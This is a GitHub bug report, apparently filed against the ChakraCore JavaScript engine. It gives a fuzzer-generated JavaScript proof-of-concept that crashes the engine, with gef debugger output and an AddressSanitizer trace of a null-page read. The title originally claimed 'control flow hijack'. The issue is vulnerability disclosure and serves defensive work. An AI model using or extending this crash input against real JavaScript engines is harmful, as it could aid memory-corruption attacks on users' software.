Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

READ memory access #6645

Open
bird8693 opened this issue Mar 17, 2021 · 0 comments
Open

READ memory access #6645

bird8693 opened this issue Mar 17, 2021 · 0 comments

Comments

@bird8693
Copy link

bird8693 commented Mar 17, 2021
edited
Loading

ubuntu

ubuntu 16

poc

function main() {
    let arr = new Array(100);
    arr[0] = 1.1;
    this.__defineSetter__(1.1);
    for (let i = 0; ijjkkk < 100000; i++)
        opt(arr, 0, 0.014717213834064102);
    Ttyn[0] = 2.3023e-320;
    opt(3.141592653589793, 1.7976931348623157e+308, 3.141592653589793);
    main();
}
var tWtH = new String();
this.x = 4660;
var hExw = 2147483649 ** -2147483649;
for (let i = 0; i < 749; i++) {
    this[i + i + i + ('new Number(1)' + ('new Number(1)' + i))] = 1;
    var aaMw = Function.prototype.toString('new Number(1)' + i);
    for (var ijjkkk = 0; ijjkkk < 100000; ++ijjkkk) {
        var KdrP = -4294967297 + -4294967295;
    }
    print();
    var QtYj = escape('v0');
    let arr = new Array(100);
}
main('valueOf', () => {
});
this.__defineSetter__('valueOf', () => {
});
var aaMw = main(tWtH);
main(0.1, -4294967295);
var AziF = Proxy;
this.__defineSetter__('\'0\'', () => {
});
opt('valueOf', () => {
});
for (let i = 0; i < b2[72]; this['new Number(1)' + i]++) {
    this.__defineSetter__('valueOf', () => {
    });
    this['new Number(1)'] = 1;
}

gef output

   0x7ffff7e225bd                  mov    QWORD PTR [rsp+0x10], rdx
   0x7ffff7e225c2                  mov    QWORD PTR [rsp+0x8], rsi
   0x7ffff7e225c7                  mov    QWORD PTR [rsp], rdi
 → 0x7ffff7e225cb                  rex.W  call rax
   0x7ffff7e225ce                  mov    rax, QWORD PTR [rbx+0x8]
   0x7ffff7e225d2                  xor    ecx, ecx
   0x7ffff7e225d4                  mov    rdx, QWORD PTR [rbp-0x28]
   0x7ffff7e225d8                  cmp    rax, QWORD PTR [rdx]
   0x7ffff7e225db                  jne    0x7ffff7e22e5e
─────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "ch", stopped 0x7ffff7e225cb in ?? (), reason: SIGSEGV
[#1] Id 2, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#2] Id 3, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
[#3] Id 4, Name: "ch", stopped 0x7ffff73d1709 in pthread_cond_timedwait@@GLIBC_2.3.2 (), reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7e225cb → rex.W call rax
[#1] 0x7fffffffd1d0 → add al, dh

asan output

ASAN:DEADLYSIGNAL
=================================================================
==52626==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f8d5ea4330b bp 0x7ffd17f7e440 sp 0x7ffd17f7e330 T0)
==52626==The signal is caused by a READ memory access.
==52626==Hint: address points to the zero page.
    #0 0x7f8d5ea4330a  (<unknown module>)
    #1 0x561a58015642 in Js::InterpreterStackFrame::CallLoopBody(void* (*)(Js::RecyclableObject*, Js::CallInfo, ...)) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6313:13
    #2 0x561a58015642 in Js::InterpreterStackFrame::DoLoopBodyStart(unsigned int, Js::LayoutSize, bool, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:6117
    #3 0x561a5801a309 in void Js::InterpreterStackFrame::ProfiledLoopBodyStart<false, true>(unsigned int, Js::LayoutSize, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5885:41
    #4 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned int) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5857:9
    #5 0x561a57e36075 in unsigned char const* Js::InterpreterStackFrame::OP_ProfiledLoopBodyStart<(Js::LayoutSize)0, true>(unsigned char const*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:5729
    #6 0x561a57e36075 in Js::InterpreterStackFrame::ProcessProfiled() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterHandler.inl:51
    #7 0x561a57d9c679 in Js::InterpreterStackFrame::Process() /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3427:20
    #8 0x561a57d9a890 in Js::InterpreterStackFrame::InterpreterHelper(Js::ScriptFunction*, Js::ArgumentReader, void*, void*, Js::InterpreterStackFrame::AsmJsReturnStruct*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:2107:40
    #9 0x561a57d99c08 in Js::InterpreterStackFrame::InterpreterThunk(Js::JavascriptCallStackLayout*) /root/AFL/compile/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:1786:16
    #10 0x7f8d5eaa0fa1  (<unknown module>)
    #11 0x561a586daa0d in amd64_CallFunction /root/AFL/compile/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100
    #12 0x561a582fec10 in Js::JavascriptFunction::CallRootFunctionInternal(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:772:24
    #13 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::RecyclableObject*, Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:717:15
    #14 0x561a582fe91e in Js::JavascriptFunction::CallRootFunction(Js::Arguments, Js::ScriptContext*, bool) /root/AFL/compile/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:832
    #15 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83::operator()(Js::ScriptContext*, TTD::TTDJsRTActionResultAutoRecorder&) const /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3705:49
    #16 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}::operator()(Js::ScriptContext*) const /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:237
    #17 0x561a57796caa in _JsErrorCode ContextAPIWrapper_Core<false, _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}>(_JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83)::{lambda(Js::ScriptContext*)#1}) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:192
    #18 0x561a57796caa in _JsErrorCode ContextAPIWrapper<false, RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83>(RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**)::$_83) /root/AFL/compile/ChakraCore/lib/Jsrt/JsrtInternal.h:235
    #19 0x561a57796caa in RunScriptCore(void*, unsigned char const*, unsigned long, LoadScriptFlag, unsigned long, char16_t const*, bool, _JsParseScriptAttributes, bool, void**) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:3656
    #20 0x561a577a049a in CompileRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**, bool) /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5019:12
    #21 0x561a577a049a in JsRun /root/AFL/compile/ChakraCore/lib/Jsrt/Jsrt.cpp:5041
    #22 0x561a57689419 in ChakraRTInterface::JsRun(void*, unsigned long, void*, _JsParseScriptAttributes, void**) /root/AFL/compile/ChakraCore/bin/ch/ChakraRtInterface.h:483:179
    #23 0x561a57689419 in RunScript(char const*, char const*, unsigned long, void (*)(void*), void*, char*, void*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:491
    #24 0x561a5768bc44 in ExecuteTest(char const*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:963:13
    #25 0x561a5768c9a7 in ExecuteTestWithMemoryCheck(char*) /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1013:10
    #26 0x561a5768c9a7 in main /root/AFL/compile/ChakraCore/bin/ch/ch.cpp:1320
    #27 0x7f8d62fc682f in __libc_start_main /build/glibc-LK5gWL/glibc-2.23/csu/../csu/libc-start.c:291
    #28 0x561a57591298 in _start (/root/AFL/tt/chnew/ch2+0x2d7298)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV (<unknown module>) 
==52626==ABORTING
@bird8693 bird8693 changed the title control flow hijack READ memory access Mar 17, 2021
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@bird8693